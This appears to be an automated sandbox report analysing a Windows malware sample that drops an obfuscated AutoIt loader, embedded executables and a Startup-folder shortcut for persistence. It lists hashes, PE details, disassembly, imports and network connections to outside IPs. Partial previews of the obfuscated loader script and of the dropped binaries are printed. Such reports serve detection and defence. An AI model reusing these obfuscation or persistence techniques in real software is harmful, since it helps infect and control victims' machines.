Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#.?NB.lNB.lNB.li..lEB.lNB.l.B.li..lMB.li..lOB.li..lOB.li..lOB.lRichNB.l................PE..L...@.dU...........!.....,...........).......@...............................p.......................................;..<....3..x....P.......................`..........................................................\............................text....+.......,.................. ..`.data...d....@.......0..............@....rsrc........P.......2..............@..@.reloc.......`.......4..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tZVdZWix.txt Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	64
Entropy (8bit):	4.839614648336088
Encrypted:	false
SSDEEP:	3:jBJXv2M3qWEu71/Ak:jBJ/X3qWuk
MD5:	CB000FE22CA02940975C83D7A5A449DD
SHA1:	B91AF48EB5649291C6BA81AA165D2FCABC604379
SHA-256:	8A45D5858030ECB58579E170823CC38F28C2EACAC2CB0BD7C9071FB8019C816B
SHA-512:	A02B88B0D57CCE8D4C7B371BF72C6CE248912818DDA102E137B9B446C3B4A569A211826D86243455F7A0695151628D23BD0B434569D35BFC207E649015305E90
Malicious:	false
Preview:	Windows 10 Pro..user..Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..

C:\Users\user\AppData\Roaming\GcyTFWdPMenYYzQBBj\Eri.eps Download File
Process:	C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	643498
Entropy (8bit):	5.865429553014856
Encrypted:	false
SSDEEP:	12288:e+5CTU487C6isxUQAOCCcCxgwAkovm8Jg:FC7g/
MD5:	890D1D73257820D0C6792F9A8DC59479
SHA1:	20669EA7EE51E51794D0F43009AA9ABB570F37A8
SHA-256:	8707B27193359B0DDAE772CF837B182770B4181FCCCD3E64903E1AE9E8955B0C
SHA-512:	EE6DB57CD22B243F5B0FD8FBC405CC1F1DED92442F47A98EFB10FACD6F5E73F6B5984685704A1A0B29D514F3649C63198369D6D7DB5A4E731C1C5941E28B8E76
Malicious:	false
Preview:	$Oglxfly = SAQxWduwfjjO("72_108_114_103_70_77_74_110_83_120_115_75_100_117_104_122_76_75_106_114_92_91_107_109_77_84_121_85_93",3)..#NoTrayIcon....Func NDfgImaDSTkyExXRlic($waFHc,$UkalIvxAV,$ZNbbgfFVT,$XIlfhgSX,$XISiBn,$AICJlT,$ZlzY)..Local $qMCRqkw = 'XzDvuXliGWZWPWalntHltTdalsXVdfAjdbKoyONtOrNeAQhrzszWEQYtrlkOqgRdcMFskpyJdDcqygRxrTCYVDImnGyUCYrAjbGOlVSpjKFwxXY'...$YINzB = 158..$jNMFqxSUgdx = 81..While ((5912-5911)*5637)..Switch $YINzB..Case 154....$VsBxuMPPWOuAvMZRF = Execute(SAQxWduwfjjO("75_90_113_103_43_80_82_83_87_124_125_115_76_109_110_86_122_90_108_123_125_44",3))..$87 = 151..For $TVFHMqZMJEJTfXJExhtRGZQkbtNOTIHBmWWOshEBxxrkuenpRR = 5 To 22..Local $DbkWFyxFEWwdVOLi = 'IXrVgoBegYIyiWElrpdDXAgPeHfQKwaJkYjdrMggKTduM'..Local $VsBxuMPPWOuAvMZRF = Execute(SAQxWduwfjjO("77_123_114_127_110_80_110_125_92_110_123_114_106_117_49_48_122_107_130_91_79_129_78_130_120_82_48_50",9)), $TGTLsjGYT = 'JgudUeTrpieBkgzEpMfHTtHPTHx'..Next....$YINzB = $YINzB + 1..Case 155....$tAOHhdpZBLsLwYB = Execute

C:\Users\user\AppData\Roaming\GcyTFWdPMenYYzQBBj\Notti.eps Download File
Process:	C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
File Type:	data
Category:	dropped
Size (bytes):	943928
Entropy (8bit):	6.625737512696406
Encrypted:	false
SSDEEP:	24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
MD5:	D6B3543F741FC22A9309AD4328B977B0
SHA1:	F75ACE4374CB7B7BD55F44D42B39223045118156
SHA-256:	A4B31A2BB4FAA628493F11AF21D9AEF7DC2536052131351DEC1F45826A355B23
SHA-512:	90FBE24B456230E7795A2CAD239852239D3384051943D3D260195BFA2D2EFE964324F198F0F2C21A5FF97ADCE7A488005478D2E9B05AA2DA8506263C1A99B1D9
Malicious:	false
Preview:	NfIeItKcjkOKepYZCKFMkXrWzIisyYsXhQiMykUBGlqQrbUBrzKTMfJQkLIqWadhUQvkejTdQtuqWhTWOFgLgbkYudAzCUEhUMWjqInRmzrHoJTYSLjdtEYvFnyLLmOVmSupsGWyibjVxDPb........................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................\|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................

C:\Users\user\AppData\Roaming\GcyTFWdPMenYYzQBBj\Scoprirvi.eps Download File
Process:	C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	117111
Entropy (8bit):	5.772481497687213
Encrypted:	false
SSDEEP:	3072:/lhqr/D24tnYhxKd/EeTgxxd1lM7OXDttKkGn22S:/cHJBEe0PlM7OXDtMki25
MD5:	FBD2CB54556AEC9D3F86DA354FDE67DB
SHA1:	5F3354B1D49A24BC503805BA39B32AC8D394DC74
SHA-256:	1E974F313E1D3235CA79FC159AE734C8E3533C48C4E508C0441C73071D93398E
SHA-512:	F6473EE4B2C5C86A1300311720942E8454B2D8D2706FFEC16D3731466BC59B800B3A44B5FE10458C35CB32F5BBB8B179C2FF1FC7B6E7AF5D6FE18F002007FD59
Malicious:	false
Preview:	iJsMaUmvYKRxZIXVASlVNnICLcRxiJHGXAIgvoHVsINqlIoQyCTtDvEJqOwW=tfgelvnqImalfEtKIaehwfEQDrBVYgHuKRjznXZjJQvrBTgSAYsvYJePKnnuVDwxSkAbsLjKaPDlSBgKPIcqWli..PbIZnTsuPekfzQAPMHtouRWppOsjoqbHrmHUejjnnbcQfYsYiF=fyYUYAmQKCtYOEDjTpGMmcFKIcuTkbayCLoCtEIzDvBWzmGjMMbPBTOUmgkCxFFjpZcecwifAhprTJdpPTinZDDIXgeQauYYRgMxrDQKEoggJLqQY..NAbuhGcMyiZsWxgkjEWWukrvTRffZkhkSdabAKwuYdnJLhkTZnn=UwWCbqjcsuNTTNmFeQKBCQXPMxLGFcdAMRsQxQqmbGPSCEPYNGRoNXTtruPefGPVPhuevJlkQkrWqyhoFMSZEiMPXjMgqXlRRTegnMBtcFaCTXrYSHbCNPsIAsypWWkSqjy..rYKSkNDZPlWqpOvzmHrwCxOuHaomzmBHSVUTXFsZjsSdxyqiASzaot=JlDlSFtFdIgihTCcUdtPlBbLCsqYByomOdkJxxnxiMBIuXNgXvnetfxiNRIAFyrlmPzWITwmRKHbZPFEEMwyHucmWtVDLXPwJsodDQGtxZlxHWiXkrWStXDzxUqDXnNTUGOIGgqNuWKIVwRZWYsIwWW..OPWJQeiWkdmwomdWroMohVbzeqGZuySYJrURssWrPOvFCQRbHxESpOnSaDHQciPynAstEmF=kIznnRRkpoaMAZOVEwmOKuHHZsiwmMSiPTGAcZxAMcGhPeEnLvmDZRwywLmuKPLvflWHzhAFGZwgmxRWNJfrjfoYRBmJAgPXJlXFyWybWUWqPNFGTCzwAIpqeYQROQtaltEfbjQQERisaiorWSQYUNbwqWDiyhJyQEQLofp..MDbIBRIUPMUVqunvHDgAJIKdowBNsbVGJpksdOmogJszaNyKux

C:\Users\user\AppData\Roaming\GcyTFWdPMenYYzQBBj\Velavi.eps Download File
Process:	C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
File Type:	data
Category:	dropped
Size (bytes):	143360
Entropy (8bit):	7.998492792403378
Encrypted:	true
SSDEEP:	3072:SCPHcI7djZ1o5BXaFIykBEt4RjkhFnRZB:SCP8I7tZureIyketSm
MD5:	E38AF13EE7173016561D1C579C8C7386
SHA1:	37670C3B7C3B51B9953151F64DE25015866569CE
SHA-256:	5D8836646F03358AF167CF96A4A27A6C3C1415E9AB61E4F3A65192ECB9C02F09
SHA-512:	E4BDEAFEA2551ADFB7B3FA7F5D9CC275D956004CC7A123532B8A7B027D431FE93328A60D0C26670EE75A179ACB3A6CF8AB98BFF34B46DA968EA8A54B06553456
Malicious:	false
Preview:	..Y..:WA'.....]x#....d..r.(....Fi....W.."I....[b.o.....\|...".V/.x.].R..9.w.Z...&.x.. .z.h]..g..G.v.X...f..4&..H/2e.....A.......A.s./c.5.........<(B/..R.u.....Lr.O....NGIb...P.LAJ...B..<..x.~.u.<\|U..p4`a...e.=)@Z..+\|...N..#a....#B...1.Nq.,p.N>.V...nJ TCm.]....`.&.B.j..Cq...`.......h.)>.........&...~.....F.p.`.....T.....T......R.Cp.m.1.fe. .....%HvKkB... .C......<x]..W..m....G&_.Q[Q.+"X.86....$!....ul....n..QV..R..a...*J3:.::m..5%X....c...0..7...:...J8.x....\.........+1.1.V.8).S.......D.p.hd..Pl0.;.a.">@b..g...3.......%.L.B]g<.O..\|.%.y..>....D.r..1#72&:}.{.A.+..t.6Q.g.,n..........}........).8..d.....(.....!@c....N.8x.fk.F..........g..\h.2.7...(.z.^....ve.3.g....?...,...G....lsAc...g.D.....D..j.A.,.$.r.e..)....;(n....Vq.B.~....;.F.X\|lL}....j..U..&h .w...J..R9.?......j...(...{......x..`..Y..<s.\......k.G.i..Q=..\e......%............#Hkf}q...rUjO.K..u.....l...>...0QQ....9...Y....H....H...CU..Hr....3%...a.Q...W. <....v..2.(..n+.....g...S-...%

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk Download File
Process:	C:\Users\user\AppData\Local\Temp\New Feature\4.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Mon Apr 12 21:12:24 2021, mtime=Mon Apr 12 21:12:24 2021, atime=Mon Apr 12 01:45:28 2021, length=328704, window=hide
Category:	dropped
Size (bytes):	938
Entropy (8bit):	4.982237865006329
Encrypted:	false
SSDEEP:	24:8N27FZ3bCHmrdQS1xrIAmwdnC22rr/tm:887F5CHmZhrvmynj2rr/t
MD5:	2568495C3650D88B8AEBB2F17FFBDE83
SHA1:	1F26FAA203907572417BA7E59506B09BDEC199C6
SHA-256:	A851F2EF4962EF136FEB61809B3B1CFC398A8107AACE3D0AED1ED386AA5C4839
SHA-512:	9DFA9B359B3D67CD346C563414E9A0C8570C26B083600A2F3B8912E70F48F1DF5E63D45834BD2868028C9C907A00709476E445A89769E77566CABF404F20DE2D
Malicious:	false
Preview:	L..................F.... ...x!.../....../....z.E/............................:..DG..Yr?.D..U..k0.&...&...........-....".8...-[.../......t...CFSF..1......NM...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......NM..R`......Y.....................R..A.p.p.D.a.t.a...B.V.1......Rh...Roaming.@.......NM..Rm......Y....................!..R.o.a.m.i.n.g.....`.1......R....SMARTC~1..H......R...R......0[........................S.m.a.r.t. .C.l.o.c.k.....j.2......R.. .SMARTC~1.EXE..N......R...R......1[........................S.m.a.r.t.C.l.o.c.k...e.x.e.......i...............-.......h.............<......C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe....S.m.a.r.t. .C.l.o.c.k.).....\.....\.....\.....\.....\.S.m.a.r.t. .C.l.o.c.k.\.S.m.a.r.t.C.l.o.c.k...e.x.e.`.......X.......048707...........!a..%.H.VZAj...`jt.+........W...!a..%.H.VZAj...`jt.+........W..E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\New Feature\4.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	328704
Entropy (8bit):	6.796040916616973
Encrypted:	false
SSDEEP:	6144:TTxj9L+GunafsHK8zIjIVp20bhPeCPHhNX:TTxJzBsq8kJ07H
MD5:	E99CED09C77FFEC9F09B33642E9B0E99
SHA1:	01217AD74FDCFE07F1EA0FE296AB4D2B809CD581
SHA-256:	02F5996141F5FE2B189D8E2B1556EAB985E55E91D9F476DABC691F7C693B2400
SHA-512:	F4D515C7E920B30E7E12EB6BC77E0446F31286259804BAEFD1B33A338CFF9DB6E688173E59A7110F11298199646F31EEC8934E502F130AF5FC765E02FC543186
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L.....^_...........................=-............@..........................0....../z..............................Pf..j....[..<....p..0...........................................................hJ..@............ ...............................text...?........................... ..`.data...<..........................@....yiku..............................@....padozocy...........................@....new.....F... ...H..................@..@.rsrc...0....p.......X..............@..@.reloc...............p..............@..B................................................................................................................................................................................................................................

\Device\ConDrv Download File
Process:	C:\Windows\SysWOW64\makecab.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	754
Entropy (8bit):	4.501722289958999
Encrypted:	false
SSDEEP:	12:xYV1JnceSZceEd0xeeQTEFhaoYwRwGHaqeS6JozUYae6dhmraMy5V:xYDBcDZcTPIjZYwWqeMUY2kHGV
MD5:	EB265F56777BD576D478648053D18075
SHA1:	562D01958A377C1C7343621F569D65E5D85E7E27
SHA-256:	64A27E60DFB2E033099969449AF134D587A47B99036531EBC6FA0F0BF078D483
SHA-512:	5C2576540026F4C56F1A962919F45967BE9C25CD3D06C188BC2390F195EEE78F1C9C0414C3A2B5CDC30EFC955B284B5921308BA3B06DC2DB8D1B133F60C18F3F
Malicious:	false
Preview:	Cabinet Maker - Lossless Data Compression Tool....MAKECAB [/V[n]] [/D var=value ...] [/L dir] source [destination]..MAKECAB [/V[n]] [/D var=value ...] /F directive_file [...].... source File to compress... destination File name to give compressed file. If omitted, the.. last character of the source file name is replaced.. with an underscore (_) and used as the destination... /F directives A file with MakeCAB directives (may be repeated). Refer to.. Microsoft Cabinet SDK for information on directive_file... /D var=value Defines variable with specified value... /L dir Location to place destination (default is current directory)... /V[n] Verbosity level (1..3)...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.647769237525862
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
File size:	749568
MD5:	5e3189812e802c0fd68ce592cb1e1999
SHA1:	38552111d3001f4998ab85408601873897653360
SHA256:	f42553b4409992bbddc1df8b716596727762a191055cd2eebb3ced648cf5384f
SHA512:	9a8d2d68feebd8b9658c4b7e5b32221112a9449b30524a36757e6022686414d714f7dc680db48fdc93dc357849604631fddf26b55204584c871367f204aee4d3
SSDEEP:	12288:hDTY0MImKSz4jaZb47XE2DUNLgjgV5cWdoGAM3GDoaCBdBaMDKif2QhR2I:dNMIOz42qDEbBV5RJ26DKO2JI
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L......]...........

File Icon


Icon Hash:	8692f0c4c4ccb2ce

Static PE Info

General
Entrypoint:	0x402d3b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5DD3AB03 [Tue Nov 19 08:42:43 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	4cc8b588252cad91c39726b15504331a

Entrypoint Preview

Instruction
call 00007F63A4EA565Ch
jmp 00007F63A4E9D10Eh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F63A4E9D2B6h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F63A4E9D2E0h
test ecx, 00000003h
jne 00007F63A4E9D281h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F63A4E9D27Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F63A4E9D2C4h
test ah, ah
je 00007F63A4E9D2B6h
test eax, 00FF0000h
je 00007F63A4E9D2A5h
test eax, FF000000h
je 00007F63A4E9D294h
jmp 00007F63A4E9D25Fh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 03E09300h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3a0d660	0x58	.new
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3a0cb1c	0x3c	.new
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3a0e000	0x1688	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3a10000	0x19e4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3a0ba70	0x40	.new
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3a09000	0x1f0	.new
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa543f	0xa5600	False	0.886749751984	data	7.87132737384	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0xa7000	0x395e23c	0x1c00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.hejus	0x3a06000	0x1	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tiyovo	0x3a07000	0x1179	0x400	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.new	0x3a09000	0x46b8	0x4800	False	0.372341579861	data	5.47508048566	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x3a0e000	0x1688	0x1800	False	0.659016927083	data	5.69317128531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3a10000	0x92ac	0x9400	False	0.147434543919	data	1.76902995344	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x3a0e1f0	0x10a8	data
RT_STRING	0x3a0f498	0xe6	data
RT_STRING	0x3a0f580	0x106	data
RT_ACCELERATOR	0x3a0f2b0	0x18	data
RT_GROUP_ICON	0x3a0f298	0x14	data
RT_VERSION	0x3a0f2d8	0x1c0	data
None	0x3a0f2c8	0xa	data

Imports

DLL

Import

KERNEL32.dll

ExitProcess, RemoveVectoredExceptionHandler, FindResourceA, WriteConsoleOutputCharacterA, SystemTimeToTzSpecificLocalTime, SetWaitableTimer, GetCurrentProcess, HeapFree, GetModuleHandleExW, CancelWaitableTimer, LockFile, SetTapeParameters, GetCompressedFileSizeW, FindResourceExA, GetLocaleInfoW, SizeofResource, SetSystemTimeAdjustment, GetFileAttributesA, GetExitCodeProcess, GetAtomNameW, GetTimeZoneInformation, GetEnvironmentVariableA, GlobalUnlock, DisconnectNamedPipe, VirtualUnlock, GetConsoleAliasesW, SetLastError, OpenWaitableTimerW, LocalAlloc, SetConsoleCtrlHandler, SetConsoleOutputCP, AddAtomA, GlobalFindAtomW, GlobalUnWire, lstrcatW, VirtualProtect, GetFileTime, LocalFree, SetFileAttributesW, LocalFileTimeToFileTime, SetEnvironmentVariableA, CompareStringW, HeapAlloc, GetStartupInfoW, RaiseException, RtlUnwind, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetLastError, DeleteCriticalSection, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, HeapDestroy, GetModuleHandleW, Sleep, GetProcAddress, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, FreeLibrary, InterlockedExchange, LoadLibraryA, MultiByteToWideChar, CloseHandle, CreateFileA, HeapSize, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, FlushFileBuffers, ReadFile, SetEndOfFile, GetProcessHeap, CompareStringA, GetModuleHandleA

USER32.dll

GetMonitorInfoA

Exports

Name	Ordinal	Address
Coruso	1	0x49f4f0
Gorgeous	2	0x49f500

Version Infos

Description	Data
InternalNames	galimatimod
FileVersions	7.0.2.54
LegalCopyrights	Wsekde
ProductVersions	7.0.21.21
Translation	0x0129 0x049b

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/12/21-15:12:19.991469	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.5	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 15:12:16.512828112 CEST	49717	80	192.168.2.5	8.211.1.15
Apr 12, 2021 15:12:16.554418087 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.554569006 CEST	49717	80	192.168.2.5	8.211.1.15
Apr 12, 2021 15:12:16.555598021 CEST	49717	80	192.168.2.5	8.211.1.15
Apr 12, 2021 15:12:16.555807114 CEST	49717	80	192.168.2.5	8.211.1.15
Apr 12, 2021 15:12:16.596908092 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.596929073 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.596937895 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.596945047 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.596991062 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.597033978 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.597116947 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.597130060 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.597191095 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.597201109 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.597224951 CEST	49717	80	192.168.2.5	8.211.1.15
Apr 12, 2021 15:12:16.597326040 CEST	49717	80	192.168.2.5	8.211.1.15
Apr 12, 2021 15:12:16.597361088 CEST	49717	80	192.168.2.5	8.211.1.15
Apr 12, 2021 15:12:16.638508081 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.638537884 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.638550043 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.638565063 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.638623953 CEST	49717	80	192.168.2.5	8.211.1.15
Apr 12, 2021 15:12:16.638681889 CEST	49717	80	192.168.2.5	8.211.1.15
Apr 12, 2021 15:12:16.638701916 CEST	49717	80	192.168.2.5	8.211.1.15
Apr 12, 2021 15:12:16.639853001 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.639873028 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.639884949 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.639892101 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.639899015 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.639906883 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.639918089 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.639924049 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.639931917 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.639944077 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.639998913 CEST	49717	80	192.168.2.5	8.211.1.15
Apr 12, 2021 15:12:16.640311956 CEST	49717	80	192.168.2.5	8.211.1.15
Apr 12, 2021 15:12:16.679864883 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.679888010 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.679897070 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.679910898 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.679919958 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.679933071 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.679941893 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.679949999 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.679959059 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.681212902 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.681263924 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.681394100 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.681415081 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.681430101 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.681513071 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.681528091 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.681535959 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.681550980 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.681560993 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.707063913 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:16.707149029 CEST	49717	80	192.168.2.5	8.211.1.15
Apr 12, 2021 15:12:16.707659960 CEST	49717	80	192.168.2.5	8.211.1.15
Apr 12, 2021 15:12:16.748936892 CEST	80	49717	8.211.1.15	192.168.2.5
Apr 12, 2021 15:12:17.333112955 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.374478102 CEST	80	49718	8.209.64.179	192.168.2.5
Apr 12, 2021 15:12:17.378030062 CEST	49718	80	192.168.2.5	8.209.64.179
Apr 12, 2021 15:12:17.378488064 CEST	49718	80	192.168.2.5	8.209.64.179
